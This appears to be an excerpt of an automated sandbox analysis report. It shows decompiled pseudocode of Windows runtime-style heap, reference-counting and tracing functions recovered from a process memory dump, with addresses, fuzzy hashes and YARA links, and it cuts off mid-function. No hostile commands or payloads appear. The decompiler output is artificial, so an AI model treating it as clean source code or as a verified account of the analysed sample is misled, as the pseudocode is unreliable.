Uniqueness Score: -1.00%

Function 053A766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E053A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E053CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E053CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L053B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x053a7672
0x053a767f
0x053a7689
0x053a76de
0x053a76de
0x053a768b
0x053a7691
0x053a7693
0x053a7697
0x00000000
0x053a7699
0x053a76a8
0x00000000
0x053a76aa
0x053a76ad
0x053a76b1
0x00000000
0x053a76b3
0x053a76b3
0x053a76b5
0x053a76ba
0x053a76bc
0x053a76bc
0x053a76c0
0x00000000
0x053a76c2
0x053a76ce
0x053a76ce
0x053a76c0
0x053a76b1
0x053a76a8
0x053a7697
0x053a76d9

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: ad5cf99f85fb4d9e326fc9d94f1a50b3222b9b87c48f4b149e21cd34c801a266
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 0B018433710519BBC721DE5ECC85F5B77AEEBC4660B240664B909DB265DA70DD0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0542C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0542C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E053D9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E053D95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E053D95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E053D95D0();
				return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0542c458
0x0542c45d
0x0542c466
0x0542c468
0x0542c469
0x0542c46a
0x0542c46b
0x0542c46e
0x0542c46f
0x0542c471
0x0542c476
0x0542c476
0x0542c47c
0x0542c47e
0x0542c480
0x0542c480
0x0542c483
0x0542c484
0x0542c486
0x0542c488
0x0542c48f
0x0542c491
0x0542c493
0x0542c493
0x0542c48f
0x0542c498
0x0542c49e
0x0542c4ad
0x0542c4ad
0x0542c4b2
0x0542c4b4
0x0542c4cd

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 62aa1571134d0e3d4e120e24760aa8f45948b63164b43232cfbb05122bdd226a
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 66018C72280515BFE621AF65CC84EA7F77EFF94390F404526F21486660CB22ACA1DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 05399080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E05399080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x54885ec;
				E053B2280(_t48, 0x54885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E053AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x548538c; // 0x77f06888
					if( *_t84 != 0x5485388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x546f6e8);
						E053ED0E8(0x54885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E054688F5(_t80, _t85, 0x5485388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x54886c0; // 0x32f07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x54886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E053B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E054688F5(0x54885ec, _t85, 0x5485388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E053DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x548b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x54884c0;
																			if(_t82 >=  *0x54884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05469063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0539922A(_t99);
										_t64 = E053B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05468B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x54886c0; // 0x32f07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x54886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x54886bc;
													_t87 = 0x54886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E05399240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x54886c4;
												_t87 = 0x54886c0;
												L27:
												E053C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E053ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x5485388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x548538c = _t51;
						goto L6;
					}
				}
			}

0x05399082
0x05399083
0x05399084
0x05399085
0x05399087
0x05399096
0x05399098
0x05399098
0x0539909e
0x053990a8
0x053990e7
0x053990e7
0x053990aa
0x053990b0
0x053990b7
0x053990bd
0x053990dd
0x053990e6
0x053990bf
0x053990bf
0x053990c7
0x053990cf
0x053990f1
0x053990f2
0x053990f4
0x053990f5
0x053990f6
0x053990f7
0x053990f8
0x053990f9
0x053990fa
0x053990fb
0x053990fc
0x053990fd
0x053990fe
0x053990ff
0x05399100
0x05399102
0x05399107
0x0539910c
0x05399110
0x05399113
0x05399115
0x05399136
0x0539913f
0x05399143
0x053f37e4
0x053f37e4
0x05399117
0x05399117
0x0539911d
0x00000000
0x0539911f
0x0539911f
0x05399125
0x00000000
0x05399127
0x0539912d
0x05399130
0x05399134
0x05399158
0x0539915d
0x05399161
0x05399168
0x053f3715
0x0539916e
0x0539916e
0x05399175
0x05399177
0x0539917e
0x0539917f
0x05399182
0x05399182
0x05399187
0x05399187
0x0539918a
0x0539918d
0x0539918f
0x05399192
0x05399195
0x05399198
0x05399198
0x05399198
0x0539919a
0x00000000
0x00000000
0x053f371f
0x053f3721
0x053f3727
0x053f372f
0x053f3733
0x053f3735
0x053f3738
0x053f373b
0x053f373d
0x053f3740
0x00000000
0x053f3746
0x053f3746
0x053f3749
0x00000000
0x053f374f
0x053f374f
0x053f3751
0x053f3757
0x053f3759
0x053f375c
0x053f375c
0x053f375e
0x053f375e
0x053f3761
0x053f3764
0x00000000
0x00000000
0x053f3766
0x053f3768
0x053f37a3
0x053f37a3
0x053f37a5
0x053f37a7
0x053f37ad
0x053f37b0
0x053f37b2
0x053f37bc
0x053f37c2
0x053f37c2
0x053f37b2
0x05399187
0x05399187
0x0539918a
0x0539918d
0x0539918f
0x05399192
0x05399195
0x00000000
0x05399195
0x00000000
0x053f376a
0x053f376a
0x053f376a
0x053f376c
0x053f376c
0x053f376f
0x053f3775
0x00000000
0x00000000
0x053f3777
0x053f3779
0x053f3782
0x053f3787
0x053f3789
0x053f3790
0x053f3790
0x053f378b
0x053f378b
0x053f378b
0x053f3792
0x053f3795
0x00000000
0x053f3795
0x00000000
0x053f3779
0x053f3798
0x00000000
0x053f3798
0x00000000
0x053f3768
0x053f379b
0x053f379b
0x053f3751
0x053f3749
0x00000000
0x053f3740
0x053991a0
0x053991a3
0x053991a9
0x053991b0
0x00000000
0x053991b0
0x05399187
0x053991b4
0x053991b4
0x053991bb
0x053991c0
0x053991c5
0x053991c7
0x053f37da
0x053991cd
0x053991cd
0x053991cd
0x053991d2
0x053991d5
0x05399239
0x05399239
0x053991d7
0x053991db
0x053991e1
0x053991e7
0x053991fd
0x05399203
0x0539921e
0x05399223
0x00000000
0x05399205
0x05399205
0x05399208
0x0539920c
0x05399214
0x05399214
0x0539920c
0x053991e9
0x053991e9
0x053991ee
0x053991f3
0x053991f3
0x053991f3
0x053991e7
0x00000000
0x00000000
0x00000000
0x05399134
0x05399125
0x0539911d
0x0539914e
0x053990d1
0x053990d1
0x053990d3
0x053990d6
0x053990d8
0x00000000
0x053990d8
0x053990cf

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea68da27b063c3355f39c5a4b6105e5d94bdfa37c84e4f7876795b2a0a6b34de
Instruction ID: 711a0d6b490a9a77e461d6692e640ac32063861da8b83724462d547c5ae2381e
Opcode Fuzzy Hash: ea68da27b063c3355f39c5a4b6105e5d94bdfa37c84e4f7876795b2a0a6b34de
Instruction Fuzzy Hash: E90181B36116049FD7199F14D844B667BBAFB45320F25406AF5158B791C7B4DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05464015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05464015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E053B2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E053B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x54886ac);
					E0539F900(0x54886d4, _t28);
					E053AFFB0(0x54886ac, _t28, 0x54886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E053AFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0546401a
0x0546401e
0x05464023
0x05464028
0x05464029
0x0546402b
0x0546402f
0x05464043
0x05464046
0x05464051
0x05464057
0x0546405f
0x05464062
0x05464067
0x0546406f
0x0546407c
0x0546407c
0x0546408c
0x0546408c
0x05464097

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e620dee0753a6fc04d7e7b104154ab4a3ac6d77d8328c5561f12b75a54fd341f
Instruction ID: b695f1516dc426d857acc441e3426e65101b0731fb387355acbeac036cff0a15
Opcode Fuzzy Hash: e620dee0753a6fc04d7e7b104154ab4a3ac6d77d8328c5561f12b75a54fd341f
Instruction Fuzzy Hash: 07018F723419857FDB55AB69CD88EA7B7ACFF85660B000226B608CBA11DB64EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 054514FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E054514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x548d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E053DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E053B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x054514fb
0x054514fb
0x0545150a
0x05451514
0x05451519
0x0545151b
0x05451526
0x0545152c
0x05451534
0x05451537
0x0545153a
0x05451545
0x05451557
0x05451547
0x05451550
0x05451550
0x05451562
0x05451563
0x05451565
0x0545156a
0x0545157f

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec6ea0ca289a404bd9931214c349206696c1535d8c97922840855ea60968d64
Instruction ID: 0d2c0d0974c052878d7e691f66d3959c018b59d645cdc8fc01526be264bcccc5
Opcode Fuzzy Hash: 5ec6ea0ca289a404bd9931214c349206696c1535d8c97922840855ea60968d64
Instruction Fuzzy Hash: 58018071A01258AFCB04DF68D845FAEBBB8EF44710F00405AB905EB280DA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0545138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0545138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x548d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E053DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E053B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0545138a
0x0545138a
0x05451399
0x054513a3
0x054513a8
0x054513aa
0x054513b5
0x054513bb
0x054513c3
0x054513c6
0x054513c9
0x054513d4
0x054513e6
0x054513d6
0x054513df
0x054513df
0x054513f1
0x054513f2
0x054513f4
0x054513f9
0x0545140e

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2183908bcc7f729e683dc367e3a8087099ebb6f7786e557e8c7b4c86f3d38a5d
Instruction ID: a6106eb0c44538f0292288538f739119406a93db7bf6debba5da8dba3acb7d0b
Opcode Fuzzy Hash: 2183908bcc7f729e683dc367e3a8087099ebb6f7786e557e8c7b4c86f3d38a5d
Instruction Fuzzy Hash: 1D015271E05218AFDB14DFA9D885FAEBBB8EF44710F00406AB905EB381DA749A01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 053AB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E053B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05417016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x053ab037
0x053ab039
0x053ab03b
0x053ab040
0x053fa60e
0x00000000
0x00000000
0x053fa61d
0x053ab04b
0x053ab04e
0x053fa627
0x053fa634
0x00000000
0x00000000
0x053fa641
0x053fa653
0x053fa643
0x053fa64c
0x053fa64c
0x053fa65b
0x00000000
0x00000000
0x00000000
0x053fa66c
0x053ab057
0x053ab057
0x053ab057
0x053ab046
0x053ab046
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 420874bd86110c678e3b4aa8b3e229c34f05c0b8426b1f0f93eda46e945488e3
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 98018F72204A809FD322C71DC998F76B7EDFB45750F0940A1FA1ACBA61D7A8DC40C720

Uniqueness

Uniqueness Score: -1.00%

Function 05461074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05461074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0546165E(__ebx, 0x5488ae4, (__edx -  *0x5488b04 >> 0x14) + (__edx -  *0x5488b04 >> 0x14), __edi, __ecx, (__edx -  *0x5488b04 >> 0x14) + (__edx -  *0x5488b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0545AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E053B7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0544FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x05461074
0x05461080
0x05461082
0x0546108a
0x0546108f
0x05461093
0x054610ab
0x054610ab
0x054610c3
0x054610cf
0x054610e1
0x054610d1
0x054610da
0x054610da
0x054610e9
0x054610f5
0x054610f5
0x054610fe

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc736b8f8ba5260e7634331152dac006f3ef5f9f1db56e48fbfbf0f9ea55ae5
Instruction ID: db64de78c0b886e4c60a2cdd5b876920f1ca14cb99f143ebfc9e5f5bf8a72106
Opcode Fuzzy Hash: 4dc736b8f8ba5260e7634331152dac006f3ef5f9f1db56e48fbfbf0f9ea55ae5
Instruction Fuzzy Hash: A1012872608741AFCB10EB29C944B9B77E5BBC4310F04CA5AF88683790DE30D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0544FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0544FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x548d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E053DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E053B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0544fe3f
0x0544fe3f
0x0544fe4e
0x0544fe58
0x0544fe5d
0x0544fe5f
0x0544fe6a
0x0544fe72
0x0544fe75
0x0544fe78
0x0544fe83
0x0544fe95
0x0544fe85
0x0544fe8e
0x0544fe8e
0x0544fea0
0x0544fea1
0x0544fea3
0x0544fea8
0x0544febd

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef2b95fa657f7bf8313878835ed815067ae815dcd17ba405aec7d23738566f0d
Instruction ID: ac758b9eec7d070b6ab11055e38ceffc6cc6d70812875bdb3b93d3c13128d73c
Opcode Fuzzy Hash: ef2b95fa657f7bf8313878835ed815067ae815dcd17ba405aec7d23738566f0d
Instruction Fuzzy Hash: 59018871F05218AFD714DF69D845FAEBBB8EF44700F00406AB9019B381D9749901CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0544FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0544FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x548d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E053DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E053B7D50() == 0) {
